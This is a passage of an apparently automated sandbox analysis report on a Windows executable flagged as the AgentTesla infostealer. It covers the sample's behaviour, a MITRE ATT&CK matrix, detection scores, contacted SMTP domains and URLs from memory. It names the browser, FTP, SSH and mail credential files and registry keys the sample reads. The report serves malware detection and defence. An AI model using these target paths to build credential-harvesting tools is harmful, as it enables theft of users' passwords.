                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                    Stealing of Sensitive Information:

                    barindex
                    Yara detected AgentTeslaShow sources
                    Source: Yara matchFile source: 00000002.00000002.476024928.0000000002E51000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.222165033.0000000003F36000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.469525382.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: BILL-OOO566876.exe PID: 1156, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: BILL-OOO566876.exe PID: 1308, type: MEMORY
                    Source: Yara matchFile source: 0.2.BILL-OOO566876.exe.40f75c0.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.BILL-OOO566876.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.BILL-OOO566876.exe.40f75c0.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.BILL-OOO566876.exe.3fb6720.3.raw.unpack, type: UNPACKEDPE
                    Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                    Tries to harvest and steal browser information (history, passwords, etc)Show sources
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Tries to harvest and steal ftp login credentialsShow sources
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                    Tries to steal Mail credentials (via file access)Show sources
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: Yara matchFile source: 00000002.00000002.476024928.0000000002E51000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: BILL-OOO566876.exe PID: 1156, type: MEMORY

                    Remote Access Functionality:

                    barindex
                    Yara detected AgentTeslaShow sources
                    Source: Yara matchFile source: 00000002.00000002.476024928.0000000002E51000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.222165033.0000000003F36000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.469525382.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: BILL-OOO566876.exe PID: 1156, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: BILL-OOO566876.exe PID: 1308, type: MEMORY
                    Source: Yara matchFile source: 0.2.BILL-OOO566876.exe.40f75c0.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.BILL-OOO566876.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.BILL-OOO566876.exe.40f75c0.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.BILL-OOO566876.exe.3fb6720.3.raw.unpack, type: UNPACKEDPE

                    Mitre Att&ck Matrix

                    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                    Valid AccountsWindows Management Instrumentation211Path InterceptionAccess Token Manipulation1Masquerading1OS Credential Dumping2Query Registry1Remote ServicesEmail Collection1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                    Default AccountsNative API1Boot or Logon Initialization ScriptsProcess Injection112Disable or Modify Tools11Credentials in Registry1Security Software Discovery211Remote Desktop ProtocolArchive Collected Data11Exfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion131Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Local System2Automated ExfiltrationNon-Application Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Access Token Manipulation1NTDSVirtualization/Sandbox Evasion131Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol11SIM Card SwapCarrier Billing Fraud
                    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptProcess Injection112LSA SecretsApplication Window Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                    Replication Through Removable MediaLaunchdRc.commonRc.commonDeobfuscate/Decode Files or Information1Cached Domain CredentialsRemote System Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                    External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information2DCSyncSystem Information Discovery114Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                    Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobSoftware Packing3Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    BILL-OOO566876.exe25%VirustotalBrowse
                    BILL-OOO566876.exe16%MetadefenderBrowse
                    BILL-OOO566876.exe52%ReversingLabsWin32.Trojan.AgentTesla
                    BILL-OOO566876.exe100%Joe Sandbox ML

                    Dropped Files

                    No Antivirus matches

                    Unpacked PE Files

                    SourceDetectionScannerLabelLinkDownload
                    2.2.BILL-OOO566876.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
                    http://www.fonts.comno0%Avira URL Cloudsafe
                    http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                    http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                    http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                    http://hBlbMr.com0%Avira URL Cloudsafe
                    http://www.tiro.com0%URL Reputationsafe
                    http://www.tiro.com0%URL Reputationsafe
                    http://www.tiro.com0%URL Reputationsafe
                    https://8chan.moe/0%Avira URL Cloudsafe
                    http://YdPNTdHEQXue9T.orgl;0%Avira URL Cloudsafe
                    http://www.goodfont.co.kr0%URL Reputationsafe
                    http://www.goodfont.co.kr0%URL Reputationsafe
                    http://www.goodfont.co.kr0%URL Reputationsafe
                    http://www.carterandcone.com0%URL Reputationsafe
                    http://www.carterandcone.com0%URL Reputationsafe
                    http://www.carterandcone.com0%URL Reputationsafe
                    http://www.carterandcone.com)0%Avira URL Cloudsafe
                    http://www.sajatypeworks.com0%URL Reputationsafe
                    http://www.sajatypeworks.com0%URL Reputationsafe
                    http://www.sajatypeworks.com0%URL Reputationsafe
                    http://www.typography.netD0%URL Reputationsafe
                    http://www.typography.netD0%URL Reputationsafe
                    http://www.typography.netD0%URL Reputationsafe
                    http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                    http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                    http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                    http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                    http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                    http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                    http://fontfabrik.com0%URL Reputationsafe
                    http://fontfabrik.com0%URL Reputationsafe
                    http://fontfabrik.com0%URL Reputationsafe
                    http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                    http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                    http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                    http://www.sandoll.co.kr0%URL Reputationsafe
                    http://www.sandoll.co.kr0%URL Reputationsafe
                    http://www.sandoll.co.kr0%URL Reputationsafe
                    http://www.urwpp.deDPlease0%URL Reputationsafe
                    http://www.urwpp.deDPlease0%URL Reputationsafe
                    http://www.urwpp.deDPlease0%URL Reputationsafe
                    http://www.zhongyicts.com.cn0%URL Reputationsafe
                    http://www.zhongyicts.com.cn0%URL Reputationsafe
                    http://www.zhongyicts.com.cn0%URL Reputationsafe
                    http://www.sakkal.com0%URL Reputationsafe
                    http://www.sakkal.com0%URL Reputationsafe
                    http://www.sakkal.com0%URL Reputationsafe
                    http://www.fonts.comx0%URL Reputationsafe
                    http://www.fonts.comx0%URL Reputationsafe
                    http://www.fonts.comx0%URL Reputationsafe
                    https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                    https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                    https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                    http://www.fontbureau.com=0%Avira URL Cloudsafe
                    http://DynDns.comDynDNS0%URL Reputationsafe
                    http://DynDns.comDynDNS0%URL Reputationsafe
                    http://DynDns.comDynDNS0%URL Reputationsafe
                    http://www.tiro.comx0%Avira URL Cloudsafe
                    https://8kun.top/0%Avira URL Cloudsafe
                    https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                    https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                    https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                    http://www.carterandcone.comY0%Avira URL Cloudsafe
                    http://www.carterandcone.comu0%Avira URL Cloudsafe
                    http://www.fontbureau.coma0%URL Reputationsafe
                    http://www.fontbureau.coma0%URL Reputationsafe
                    http://www.fontbureau.coma0%URL Reputationsafe
                    http://en.w0%URL Reputationsafe
                    http://en.w0%URL Reputationsafe
                    http://en.w0%URL Reputationsafe
                    https://raw.githubusercontent.com/0%Avira URL Cloudsafe
                    http://www.carterandcone.coml0%URL Reputationsafe
                    http://www.carterandcone.coml0%URL Reputationsafe
                    http://www.carterandcone.coml0%URL Reputationsafe
                    http://www.founder.com.cn/cn0%URL Reputationsafe
                    http://www.founder.com.cn/cn0%URL Reputationsafe
                    http://www.founder.com.cn/cn0%URL Reputationsafe
                    http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                    http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                    http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                    http://YdPNTdHEQXue9T.org0%Avira URL Cloudsafe
                    http://www.tiro.comc0%URL Reputationsafe
                    http://www.tiro.comc0%URL Reputationsafe
                    http://www.tiro.comc0%URL Reputationsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    us2.smtp.mailhostbox.com
                    		208.91.199.225
                    		truefalse
                      		high
                      smtp.syntrnomh.com
                      		unknown
                      		unknowntrue
                        		unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://127.0.0.1:HTTP/1.1BILL-OOO566876.exe, 00000002.00000002.476024928.0000000002E51000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		low
                        http://www.fontbureau.com/designersGBILL-OOO566876.exe, 00000000.00000002.225516202.00000000054C0000.00000002.00000001.sdmpfalse
                          		high
                          http://www.fonts.comnoBILL-OOO566876.exe, 00000000.00000003.202973628.00000000053EB000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://github.com/murrty/ychanex/releases/latestBILL-OOO566876.exe, 00000000.00000002.221101600.0000000002F11000.00000004.00000001.sdmpfalse
                            		high
                            http://www.fontbureau.com/designers/?BILL-OOO566876.exe, 00000000.00000002.225516202.00000000054C0000.00000002.00000001.sdmpfalse
                              		high
                              http://www.founder.com.cn/cn/bTheBILL-OOO566876.exe, 00000000.00000002.225516202.00000000054C0000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              https://api.420chan.org/BILL-OOO566876.exe, 00000000.00000002.221101600.0000000002F11000.00000004.00000001.sdmpfalse
                                		high
                                http://www.fontbureau.com/designers?BILL-OOO566876.exe, 00000000.00000002.225516202.00000000054C0000.00000002.00000001.sdmpfalse
                                  		high
                                  http://hBlbMr.comBILL-OOO566876.exe, 00000002.00000002.476024928.0000000002E51000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.tiro.comBILL-OOO566876.exe, 00000000.00000002.225516202.00000000054C0000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  https://8chan.moe/BILL-OOO566876.exe, 00000000.00000002.221101600.0000000002F11000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.fontbureau.com/designersBILL-OOO566876.exe, 00000000.00000002.225516202.00000000054C0000.00000002.00000001.sdmpfalse
                                    		high
                                    http://YdPNTdHEQXue9T.orgl;BILL-OOO566876.exe, 00000002.00000002.476441058.0000000002EFC000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		low
                                    http://www.goodfont.co.krBILL-OOO566876.exe, 00000000.00000002.225516202.00000000054C0000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.carterandcone.comBILL-OOO566876.exe, 00000000.00000003.206256359.00000000053D9000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.carterandcone.com)BILL-OOO566876.exe, 00000000.00000003.206174068.00000000053D7000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		low
                                    http://www.sajatypeworks.comBILL-OOO566876.exe, 00000000.00000003.202808276.00000000053EB000.00000004.00000001.sdmp, BILL-OOO566876.exe, 00000000.00000002.225516202.00000000054C0000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.typography.netDBILL-OOO566876.exe, 00000000.00000002.225516202.00000000054C0000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.founder.com.cn/cn/cTheBILL-OOO566876.exe, 00000000.00000002.225516202.00000000054C0000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.galapagosdesign.com/staff/dennis.htmBILL-OOO566876.exe, 00000000.00000003.211731693.000000000540D000.00000004.00000001.sdmp, BILL-OOO566876.exe, 00000000.00000002.225516202.00000000054C0000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://fontfabrik.comBILL-OOO566876.exe, 00000000.00000002.225516202.00000000054C0000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    https://github.com/murrty/ychanexBILL-OOO566876.exe, 00000000.00000002.221101600.0000000002F11000.00000004.00000001.sdmpfalse
                                      		high
                                      https://github.com/BILL-OOO566876.exe, 00000000.00000002.221101600.0000000002F11000.00000004.00000001.sdmpfalse
                                        		high
                                        http://www.galapagosdesign.com/DPleaseBILL-OOO566876.exe, 00000000.00000002.225516202.00000000054C0000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.fonts.comBILL-OOO566876.exe, 00000000.00000002.225516202.00000000054C0000.00000002.00000001.sdmpfalse
                                          		high
                                          http://www.sandoll.co.krBILL-OOO566876.exe, 00000000.00000002.225516202.00000000054C0000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.urwpp.deDPleaseBILL-OOO566876.exe, 00000000.00000002.225516202.00000000054C0000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.zhongyicts.com.cnBILL-OOO566876.exe, 00000000.00000002.225516202.00000000054C0000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.sakkal.comBILL-OOO566876.exe, 00000000.00000002.225516202.00000000054C0000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.fonts.comxBILL-OOO566876.exe, 00000000.00000003.202973628.00000000053EB000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zipBILL-OOO566876.exe, 00000000.00000002.222165033.0000000003F36000.00000004.00000001.sdmp, BILL-OOO566876.exe, 00000002.00000002.469525382.0000000000402000.00000040.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.fontbureau.com=BILL-OOO566876.exe, 00000000.00000003.218522176.00000000053D0000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		low
                                          http://www.apache.org/licenses/LICENSE-2.0BILL-OOO566876.exe, 00000000.00000002.225516202.00000000054C0000.00000002.00000001.sdmpfalse
                                            		high
                                            http://www.fontbureau.comBILL-OOO566876.exe, 00000000.00000003.218522176.00000000053D0000.00000004.00000001.sdmpfalse
                                              		high
                                              http://DynDns.comDynDNSBILL-OOO566876.exe, 00000002.00000002.476024928.0000000002E51000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.tiro.comxBILL-OOO566876.exe, 00000000.00000003.204324110.00000000053EB000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://8kun.top/BILL-OOO566876.exe, 00000000.00000002.221101600.0000000002F11000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%haBILL-OOO566876.exe, 00000002.00000002.476024928.0000000002E51000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.carterandcone.comYBILL-OOO566876.exe, 00000000.00000003.206174068.00000000053D7000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.carterandcone.comuBILL-OOO566876.exe, 00000000.00000003.206256359.00000000053D9000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.fontbureau.comaBILL-OOO566876.exe, 00000000.00000003.218522176.00000000053D0000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.fontbureau.com/designers/cabarga.htmldBILL-OOO566876.exe, 00000000.00000003.208525319.000000000540D000.00000004.00000001.sdmpfalse
                                                		high
                                                http://en.wBILL-OOO566876.exe, 00000000.00000003.203328834.00000000053D7000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                		unknown
                                                https://raw.githubusercontent.com/BILL-OOO566876.exe, 00000000.00000002.221101600.0000000002F11000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
